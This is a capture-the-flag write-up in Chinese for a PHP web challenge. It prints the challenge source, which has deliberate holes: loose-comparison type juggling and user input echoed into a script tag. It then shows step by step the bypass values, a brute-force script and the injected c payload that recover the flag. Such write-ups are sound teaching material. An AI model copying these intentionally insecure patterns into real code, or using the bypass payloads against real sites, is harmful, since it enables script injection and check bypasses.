web1
Web 1
<?php
highlight_file(__FILE__);
error_reporting(E_ALL);
ini_set('display_errors', 0);
$flag1 = 0;
$a = $_GET['a'];
$b = $_GET['b'];
if(isset($a) && strpos(base64_decode('MW82MmU3ZTYxZTQzZTk0YTE='),$a) && floatval($a) < 10000000 && floatval($a) > 6000000 && strlen($a) <= 4){
$obj = (object)$b;
if(isset($b) && strpos(strrchr(md5(sha1($obj->scalar)),'b1'),'fca7')){
$flag1 = 1;
echo "You're ok flag"."\n";
$c = isset($_GET['c']) ? $_GET['c'] : '';
$c = urldecode($c);
if (isset($c) && preg_match('/setItem\s*\(\s*[\'"](.+?)[\'"]\s*,\s*(\[.*\])\s*\)/', $c, $matches)) {
$m = $matches[1];
$n = $matches[2];
$value = json_decode($n, true);
if (json_last_error() === JSON_ERROR_NONE) {
$result = [$m, $value];
if(is_array($result[1]) && is_numeric($result[1][1]) && !is_numeric($result["0"]) && $result["0"] > 2024 ){
if($result[1][1] == "9999999999999999" && $result[1][1] !== "9999999999999999"){
$i = $result[0];
echo "<script>$c</script>";
echo "<script>
var t = window.sessionStorage.getItem('".$i."');
console.log(t)
const url = 'inc.php?flag1=".$flag1."&value=' + encodeURIComponent(t);
window.location.href = url;
</script>";
}else{
die("Emmm...");
}
}else{
die("Emmm...");;
}
} else {
die("Emmm...");;
}
} else {
die("Emmm...");;
}
} else { die("Emmm..."); }
} else { die("Emmm..."); }
?>
1、解码MW82MmU3ZTYxZTQzZTk0YTE=得到1o62e7e61e43e94a1,结合后面a小于10000000大于6000000,得到a值为7e6
2.编写一个简单脚本暴力出b即可
<?php
$b=1;
$obj = (object)$b;
while(!strpos(strrchr(md5(sha1($obj->scalar)),'b1'),'fca7')){
$b++;
$obj = (object)$b;
}
得到b值为591
3.弱相等存在精度问题,所以可以写一个小数点后极小的数来绕过,但强相等不会。根据弱相等得到'2025a'。最后根据正则表达式构造出c为sessionStorage.setItem('2025a',[123,9999999999999999.0000000000001])
4.进入到inc.php文件后,查看源代码有base85的字样,考虑对cookie进行base85解码
import base64
data = "Ao(mgHUKl=<&\\AbEBu<QF]NB_COH" #注意要对\进行转义
flag = base64.a85decode(data)//base64.b85decode(data)
print(flag)
得到flag:flag{D9xT7ePqA1LuVnYk}
浙公网安备 33010602011771号